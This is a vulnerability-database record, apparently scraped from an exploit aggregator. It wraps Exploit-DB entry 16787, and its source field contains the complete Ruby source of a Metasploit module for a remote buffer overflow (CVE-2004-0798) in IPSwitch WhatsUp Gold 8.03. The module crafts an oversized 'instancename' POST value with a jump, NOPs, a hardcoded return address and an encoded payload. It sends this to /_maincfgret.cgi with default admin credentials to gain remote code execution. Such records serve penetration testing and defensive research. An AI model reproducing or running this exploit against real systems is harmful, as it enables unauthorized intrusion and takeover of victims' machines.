DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:16787", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)", "description": "", "published": "2010-07-14T00:00:00", "modified": "2010-07-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/16787", "reporter": "Metasploit", "references": [], "cvelist": ["2004-0798"], "immutableFields": [], "lastseen": "2022-08-16T06:44:19", "viewCount": 18, "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2004-0798"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1661182887, "score": 1661184847}, "_internal": {"score_hash": "85f3824ad3e8a84296b9a71b0252dce0"}, "sourceHref": "https://www.exploit-db.com/download/16787", "sourceData": "##\r\n# $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\t# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm=\"WhatsUp Gold\" )\r\n\tHttpFingerprint = { :pattern => [ /WhatsUp/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\r\n\t\t\t\tposting a long string for the value of 'instancename' in the _maincfgret.cgi\r\n\t\t\t\tscript an attacker can overflow a buffer and execute arbitrary code on the system.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9820 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2004-0798'],\r\n\t\t\t\t\t['OSVDB', '9177'],\r\n\t\t\t\t\t['BID', '11043'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 25 2004'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t\tOptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),\r\n\t\t\t\tOptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']),\r\n\t\t\t], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tc = connect\r\n\r\n\t\tnum = rand(65535).to_s\r\n\t\tuser_pass = \"#{datastore['HTTPUSER']}\" + \":\" + \"#{datastore['HTTPPASS']}\"\r\n\r\n\t\treq = \"page=notify&origname=&action=return&type=Beeper&instancename=\"\r\n\t\treq << rand_text_alpha_upper(811, payload_badchars) + \"\\xeb\\x06\"\r\n\t\treq << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded\r\n\t\treq << \"&beepernumber=&upcode=\" + num + \"*&downcode=\"+ num + \"*&trapcode=\" + num + \"*&end=end\"\r\n\r\n\t\tprint_status(\"Trying target %s...\" % target.name)\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/_maincfgret.cgi',\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'content-type' => 'application/x-www-form-urlencoded',\r\n\t\t\t'data' => req,\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'Authorization' => \"Basic #{Rex::Text.encode_base64(user_pass)}\"\r\n\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend", "osvdbidlist": ["9177"], "exploitType": "remote", "verified": true}

{}